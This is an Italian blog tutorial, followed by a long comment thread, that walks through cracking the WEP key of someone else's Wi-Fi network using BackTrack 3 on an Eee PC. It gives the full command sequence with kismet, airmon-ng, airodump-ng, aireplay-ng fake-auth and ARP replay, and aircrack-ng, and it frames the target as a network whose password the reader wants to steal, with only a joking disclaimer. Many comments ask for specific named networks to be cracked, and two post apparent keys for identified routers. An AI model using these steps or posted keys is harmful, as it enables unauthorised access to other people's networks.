Ricerca personalizzata
RSS
email

Ricerca nel Sito

Ricerca personalizzata

Guida su "Trovare password wep rete wifi"



Con Questa guida intendo spiegare nel lato pratico come è possibile crackare una chiave wep per mezzo di BackTrack 3 e di un asus Eeepc.(la guida è stata testata su un asus eee701)

PASSO 1)

Per prima cosa dobbiamo  inserire 
il programma che ci consentire di fare il tutto in una penna usb (poi capirete il perchè), e per fare ciò occorre
scricare QUESTO programma. (NB:il passo 1 va fatto solo la prima volta, tranne che formattate la penna usb, in quel caso dovete rifarlo)

Una volta scaricato:
  1. inserite la vostra pennetta usb da almeno 1 GB nel pc.
  2. Formattatela.
  3. Avviate il programma appena scaricato (unebootin)


Adesso:
            ATTENZIONE: per i punti 1-2-3-4 che seguono qua giù è necessario che siate collagati ad internet
  1. cliccate su "select distribution" e selezione come nell'immagine "backtrack".
  2. su "tipo" seleziona periferica usb.
  3. su "disco" scegliete la lettera che corrisponde alla vostra penna usb(nel mio caso è G:\ ma nel vostro potrebbe essere qualsiasi altra lettera,basta quardare su risorse del computer!!).
  4. cliccate ok
  5. Attendete il che il programma finisca il tutto (potrebbe impiegare anche qualche ora,dipende dalla velocità della vostra connessione ad internet).
  6. Fatto ciò scollagate il pennino.
  7. Spegnete il pc (vi conviene stampare la guida o seguirla su un altro pc senno non si può andare avanti).                        Fine PASSO 1).
        
  Adesso comincia la procedure piu complicata.Fate attenzione.

Una volta spento il pc procediamo con mettere la chiavetta dentro l'eeepc spento(scusate la ripetizione!), accendiamolo e quando compare la schermata iniziale (circa 1-2 secondi dopo l'accensione) cliccate ripetutamente il tasto ESC fino a quando non vi compare la lista delle unità avviabili (dovrebbe essere simile a questa la schermata)(se si dovesse avviare il windows normalmente spegnete e rirpovate; se il tasto esc non fa partire il progrmma provate canc oppure f12 oppure f3 dipende dal pc).


 

quindi sceglierete la vostra chiave usb spostandovi con i pulsanti SU e GiU'.(praticamente dovete selezionare la riga dove sta scritto usb,se ve ne stanno scritte piu di una selezionate la prima e se non funziona provate la seconda ).


Fatto cio si avvierà il programma, attendete...


Ora vi chiederà che interfaccia grafica utilizzare scegliete la prima della lista ovvero KDE
(per comodità) poi inizierà a caricare il sistema operativo e subito dopo vi chiederà la
risoluzione e voi clickerete il tasto SPACE.
Ok attendete un paio di minuti che si avvii la distro.
Ottimo ora siamo pronti per procedere a cercare e crackare reti wireless con chiave wep.
Apriamo il terminale e digitiamo:  kismet -c madwifi_g,wifi0,wifi0      (Fig.2):





Adesso dovrebbero comparire le varie reti:
  1. Schiaccia il tasto " S " dalla tastiera (si aprirà cosi un menù).
  2. Digita adesso " W ".
  3. Adesso spostati con le frecce sulla rete alla quale vuoi fregare la password
  IMPORTANTE: NON TUTTE LE RETI SONO CRECKABILI, QUELLO CHE POSSONE ESSERE CRACKATE SONO CONTRADDISTINTE DA UNA " Y " SOTTO IL CAMPO "W" (quello scritto in bianco in alto tra "T" e"ch")
Consiglio: selezionate la rete che ha il valore "size" più alto
  
Adesso hai tutti i dati che ti servono per sferrare l'attacco


Apri un nuovo terminale digita:
  1. Digita "iwconfig"
  2. Poi digita "airmon-ng stop kis0"
  3. Poi digita " airmon-ng stop ath0 "
  4. Adesso riapri nuovamente un terminale e digita: "airmon-ng start wifi0 6"  (6 lo sostituisci con il canale dell'access point che lo trovi nella
finestra di kismet quella già aperta dove ci sono i dati della rete, dove sta scritto kismet network details)


Adesso partiamo all'attacco apri un nuovo terminale :
  1. Digita" airodump-ng --ivs -w /root/capture --channel(scrivi il canale dell'access point) ath0 "
  2. Apri un nuovo terminale e digita : "aireplay-ng -1 0 -e (ssid il nome della rete) -a (bssid il mac dell'access point) -h 00:11:22:33:44:55 ath0 "  (quei numeri 00:11:22...ect devi sostituirli con quelli del tuo indirizzo mac)
  3. Apri un  nuovo terminale :"aireplay-ng -3 -b (bssid il mac dell'access point) -h 00:11:22:33:44:55 ath0"
  4. Ora raccogli almeno 10000 pacchetti data ovvero quelli sotto la colonna "Data" come nell'immagine:




Non appena "Data arriva a 10000 (o di piu!)":
  1. Apriamo un altro terminale e digitiamo: "aircrack-ng -s /root/capture-01.ivs"
Devi selezionare la rete e dopo parte il cracking,devi solo attendere che lui attraverso i
pacchetti data che sono i pacchetti ivs provi varie combinazioni fino a trovare la chiave.
In genere calcola che se la chiave è una 64-bit bastano 20000 se è 128-bit ne servono
intorno ai 40000

Questa guida è stata creata puramente a scopo educativo e se ne fate un uso
sconveniente sono fatti vostri ;-)!
Tutorial by flashato90
Mail: leonidaxx90@hotmail.it
Un Ringraziamento speciale a Stefano B.

Per info lasciate commenti o contattate.

Bookmark and Share

83 commenti:

Anonimo ha detto...

E' un pò difficilino però... Sopratutto l'ultima parte XD

Anonimo ha detto...

ottima guida ma io non riesco nemmeno a partire.....possibile che bactrack 3 non riconosca la mia scheda atheron ar9285 dell eeepc 1008p ????come è possibile farla riconoscere?!?

flashato ha detto...

Quando ho un attimo pubblico quella compatibile con qualsiasi pc...

Anonimo ha detto...

Per sbaglio ho installato unetbootin in c:\ ,come faccio ad eliminarlo in modo tale che non mi esca al boot iniziale(da sceglere se windows o unetbootin)?

Anonimo ha detto...

00:11:22:33:44:55 ath0 " (quei numeri 00:11:22...ect devi sostituirli con quelli del tuo indirizzo mac).... come faccio a capire qual'è il mio indirizzo mac??

Anonimo ha detto...

ciao, fa il passo uno senza errori, pero non crea niente su cd.

Internet c'è.

C'è un altro modo per fare la pennetta ?

grazie

Adrian

flashato ha detto...

Devi inserire un pennino non un cd! Prova e fammi sapere :) ciao ciao

Anonimo ha detto...

Ragazzi ho un grosso problema...Scarico il programmino, l'installo su un pennetta, spengo il pc e mi porto la penna su un altro pc.
Faccio partire il pc dalla penna e mi rimane in ciclo con la scritta "autobootin in ... e fa il count".
Xk non parte??? premendo tam posso inserire il comando x forzare ma non so qual'è...Aiutatemi!!!

Anonimo ha detto...

Ragazzi ho un prolemone.
Al momento del boot nn mi parte!
seleziono la penna e mi va su una skermata dv mi scrive:
in alto in un format default e sotto la scritta autobooting in... e fa il count 10-9..ecc.
xk non parte?
se premo tab mi da la stringa x inserire i comandi ma qual'è quello x farlo partire?? aiuto!!!

Anonimo ha detto...

stesso problema ... non parte...

Anonimo ha detto...

Non utilizzo un eepc ma un Dell.. quando faccio partire il sistema dalla chiavetta mi trovo che mi propone un "default" avvio e non mi fa fare niente... mi dice "premi [TAB] per selezionare ma non mi fa scegliere niente.
Se premo ESC mi trovo che mi propone la root, ma non posso fare niente...

Andrea Zago ha detto...

sembra complicato... speriamo bene...

Anonimo ha detto...

questo è il giusto link per lo scarico del programma
http://unetbootin.sourceforge.net/

Unknown ha detto...

questa procedura la posso fare un pc toshiba ? con window xp ?

Unknown ha detto...
Questo commento è stato eliminato dall'autore.
Unknown ha detto...

anche a me dopo il riavvio non carca nulla come posso fare?

Anonimo ha detto...

Io ho scaricato il programma l'ho messo su pen drive ma quando entro dentro il boot mi esce una schermata grigia con sopra scritto default e con sotto "Press TAB to edit options" con il conto alla rovescia sotto che se finisce riavvia sempre! Non so come posso fare, aiutoooooooo!!!!!!!!!

clough ha detto...

Io sono davvero incapace...non c'è qualcuno che gentilmente mi può dire la password per questa linea???
Perfavoreeee......
Alice-36381717
Aiutatemiiiiiiiiiiiiiiiii

Anonimo ha detto...

Ma posso farlo con un netbook della marca 'compat' , ma il programma Hp ?

Anonimo ha detto...

Ciao! chiedo scusa ma quando parte...la prima voce KDE non esiste,parte subito Backtrac 5. come mai? Grazie!

Anonimo ha detto...

non mi scarica il programma iniziale percheè è caricato su megaupload che l hanno chiuso!

Anonimo ha detto...

a ladroniiiiiiiiii!!!!!!!!!!!!!!!!

Anonimo ha detto...

ah ah ah ah ah!!!!

Anonimo ha detto...

Il download è caricato su megaupload è quindi non si può scaricare... Un link alternativo??

Anonimo ha detto...

grazie funziona tutto boss!!!!!

Anonimo ha detto...

Salve,
non riesco a scaricare il programmino, perchè il sito risulta chiuso, come posso fare???

Anonimo ha detto...

http://unetbootin.sourceforge.net/
Io ho scaricato il programma qui...ora provo vediamo se funge su un acer...vi farò sapere...grazie

Anonimo ha detto...

Anonimo ha detto...
grazie funziona tutto boss!!!!!

16 ottobre 2012 00:22

NON SPARARE CAZZATE DEFICIENTE !!!

Anonimo ha detto...

E su android come si potrebbe fare?

Anonimo ha detto...

Come si fa ad accorgersi se qualcuno sta usando la tua connessione wi-fi? Perché ho il sospetto che l'appesantimento della mia rete negli ultimi tempi sia dovuto a qualcosa del genere...

AnDyThEfAsT ha detto...

ciao se posdo aiutarti te la do io

in pvt andythefast@libero.it

Anonimo ha detto...

da anonimo password per rete alice-36381717 wgl3ihyukw8oayu7p7t2vgk2 ciaooooooo

Anonimo ha detto...

Chi mi da la password di
-SitecomC65EA0
VI PREGO SONO DISPERATO NON TROVO PIU' LA PASSWORD

Anonimo ha detto...

Mi potete per favore trovare la password di:
Alice-82009428
Grazie in anticipo

Anonimo ha detto...

Il passo 1 mi dice ke il programma non esiste comunque a volte io uso per l' iphone il programma wpa tester che cracca le seguenti reti: Alice, Fastweb, Infostrada Wifi, TeleTu, Tele 2, Dlink,Zon, Huawei, Sky, Ono, Tecom, Verizon, Discus, WLAN_(dict), WLAN_, WLAN, JAZZTEL_, YaCOM, WiFi, ADSL, D-LINK WIRELESS, Eircom,Thomson,SpeedTouch, BTHomeHub, O2Wireless, Vodafone, Meo, Sapo, Bbox, privat, DMAX, INFINITUM, Orange, BigPond, Otenet, Cyta. Non tutti gli SSIDN o valori iniziali sono sopportati però.

Anonimo ha detto...

chimipuo'dire la password della rete DRUGONET?

Anonimo ha detto...

PER ME E' DIFFICILE,SE QUALCUNO PUO' AIUTARMI A CRACCARE UNA LINEA TNCAP 1ECB29,NN SO' NEANCHE CHE LINEA E'.GRAZIE.

Unknown ha detto...

io non ci riesco è davvero arabo per me! mi scuso per l'ingnoranza comunque potete trovarmi la password di una rete wifi alice:

Alice-78648894
Mac: 00:1d:6a:a5:f7:3e

Anonimo ha detto...

io non ci riesco è davvero arabo per me! mi scuso per l'ingnoranza comunque potete trovarmi la password di una rete wifi alice:

Alice-78648894
Mac: 00:1d:6a:a5:f7:3e

Anonimo ha detto...

Ho provato ma non riesco...qualcuno gentilmente riesce a trovarmi la password di queste due linee?
grazie
WebCube42-999B
Alice-64496585
vi pregoooo

Anonimo ha detto...

ciao a tutti, sono a Tolosa (Francia), e qui in giro ci sono parecchi punti di accesso a "Free WiFi", qualcuno avrebbe delle credenziali di accesso che non utilizza?

Grazie, ne ho davvero bisogno x tenermi in contatto con i miei bambini in Italia

Anonimo ha detto...

Salve volevo chiedere se è possibile trovare la password per questa rete:
TNCAP896FA3

se si potete rispondermi con la probabile password?
grazie in anticipo

Unknown ha detto...

alla rete wifi Alice-64496585 Password: 158ize4ymnixt27kjieggsat

comunque sei di settimo Torinese perché quella connessione c'è l'ho anch'io c'è diciamo comunque contattiami alla e-mail : espertdanik@gmail.com

Anonimo ha detto...

ciao,
potreste x favore fare una guida per chi utilizza Mac OS?
grazie

Anonimo ha detto...

Alice-49742030
mi potete aiutare a scovare la password!!
Grzie mille! :)

Anonimo ha detto...

ciao potete scovare la password del seguente router: TNCAPE5B4B5

Anonimo ha detto...

emm ma quale programmino devo installare (quello da mettere sulla pennetta)

Anonimo ha detto...

Che guida pratica ed efficace! Ottimo

Anonimo ha detto...

Raga, da dove scarico il programma perche´non mi da il link...

Anonimo ha detto...

Il programma è scaricabile dal sito:
http://unetbootin.sourceforge.net/

Anonimo ha detto...

Salve! Mi potreste trovare questa password? Telecom-93651497 ho provato ma proprio non capisco nulla! Grazie :)

TheKernel ha detto...

MA QUINDI SU PC 'CLASSICO' NN PUO ESSERE APPLICATA LA STESSA PROCEDURA?
e qualcuno potrebbe trovarmi la psw di una di queste reti?

- TNCAP2072FD
- TCNAP9F0CE5
- Vodafone-26055361

thankd

gianfranc117 ha detto...

tutti quelli che non riescono a trovare la password del router come alice fastweb infos ecc scaricatevi un piccolo programmino funzionante si chiama ufowarding

gianfranc117 ha detto...

se non sapete come funziona contattatemi via imail gianfranco1942@hotmail.it

Anonimo ha detto...

che idioti che siete... se non riuscite nemmeno ad avviare un computer via USB i credete davvero di riuscire a craccare una rete wifi ?fate pena

Unknown ha detto...

mi sapete trovare questa psw di Telecom: TELECOM-90045469 con mac address 58-98-35-5D-FC-1D

vediamo chi ci riesce?
io penso che nessuno possa riuscirci!

Anonimo ha detto...

Per tornare al sistema operativo normale come si fa???
io non ho ancora provato e volevo info!!

Anonimo ha detto...

ed avevi ragione francesco santoro ;) uahahahha ancora con sti giochini psicologici )

Anonimo ha detto...

mi dite la password di NETGEAR81 oppure di belkin.62e
grazie mille :) XD

Unknown ha detto...

Io no ho fatto niente ma il coglione che ha dato queste informazioni e uno stronzo x provare coglione dammi la pass di questo ssid:Alice 06172878 e la mia voglio vedere
Proprio a che livello sei coglione.
Sono tutte cazzate....

Anonimo ha detto...

salve sono nuovo qui e non riesco a entrare nella rette infostradawifi-003706 aiutatemi perfavoreeeee grazieee

Anonimo ha detto...

mi aiutatte per favore con infostradawifi-f50ae6

Unknown ha detto...

Gentilmente potete aiutarmi con queste 2 reti ... sono propio ignante su queste cose.
Tiscali 00:26:44:38:af:f7
Netgear55 20:4e:7f:af:27:54

Unknown ha detto...

Qua dicono che sei capace altri dicono che sono tutte cavolate ...vediamo un po come si dimostrano le cose .

Anonimo ha detto...

C e qlcn serio capace di craccare password al volo?

Anonimo ha detto...

Salve mi aiutate a trovare la pass di questa rete : TP-LINK_FCDD86 grazie in anticipo ;)

Anonimo ha detto...

Buonasera siccome non sono pratico volevo sapere se gentilmente qualcuno può dirmi la password di TeleTu_f0842f265b51. Grazie

Anonimo ha detto...

ciaoo password x alice45395077 grazie

Anonimo ha detto...

ciao ragazzi, a me non si apre.. mi potete trovare la pass di questa wifi? Alice-73365521 graziee ciaoo

sasa"""" ha detto...

Ciao scusami mi puoi aiutare a trovare la passw di queste linee x favore sono molto disperato grazie!!!!! teletu_008c54c95f01 fastweb_1_RynTebb9XMDD

sasa" ha detto...

Ciao scusami mi puoi aiutare a trovare la passw di queste linee x favore sono molto disperato grazie!!!!! teletu_008c54c95f01 fastweb_1_RynTebb9XMDD

Anonimo ha detto...

salve a tutti scusatemi sapreste trovarmi la chiave di questa rete Telecom-64370673grazie mille in anticipo a chi riesce si tratta solo di 5 6 gg finquando non faccio il passaggio dell altro operatore :)

Anonimo ha detto...

Cracco reti alice

Anonimo ha detto...

Potete dirmi la password di questa rete? TNCAP5DE57D oppure di Alice-76711792 ringrazio in anticipo :)

Anonimo ha detto...

Ma è possibile crackare tutte le reti wifi tramite smartphone? (nel mio caso s4)??

Unknown ha detto...

ciao io sono un'incapace in queste cose, potreste trovarmi la password di questa rete? WebCube42-ABFF
Non la trovo più.
Nel caso, potreste inviarmela nella mia e-mail? Kaja.95@hotmail.it
Ringrazio in anticipo, per favore mi serve

Anonimo ha detto...

da Mimmo ciao chiedo scusa perche' incompetente, non riesco a trovare la password di telecom-89193929 ? ringrazio di cuore la persona che mi viene in aiuto, ciao

Anonimo ha detto...

ciao a tutti mi potete aiutare a trovare la password di questa rete ? Alice-76492321

Unknown ha detto...

Ciao a tutti, siccome ho il computer che mi va lento mi potreste trovare le password di queste reti wifi alice-7774353 vodafone-30599031 oppure infostradawifi-008808, per le risposte contattatemi qui giuseppebarba2001@gmail.com
Grazie a tutti quelli che ci proveranno

Relativo ha detto...

HELPPPPP......Ciao a tutti...ragazzi non saro' mai capace di fare tutte queste cose...sono un po a secco di informatica :-) . Qualcuno puo perfavore calcolarmi la passw per la rete Alice-48844037 .... vi ringrazio gia da ora...

Anonimo ha detto...

tutte cazzate ho io la soluzione

Anonimo ha detto...

50€ da versare prima e poi vi svelo il trucco capre ignoranti

Rocco ha detto...

Salve, ma per caso è possibile trovare password di un router linkem? Su internet non trovo nulla per farlo, mi potreste aiutare?
Il nome del router è: Linkem_21F254
Grazie.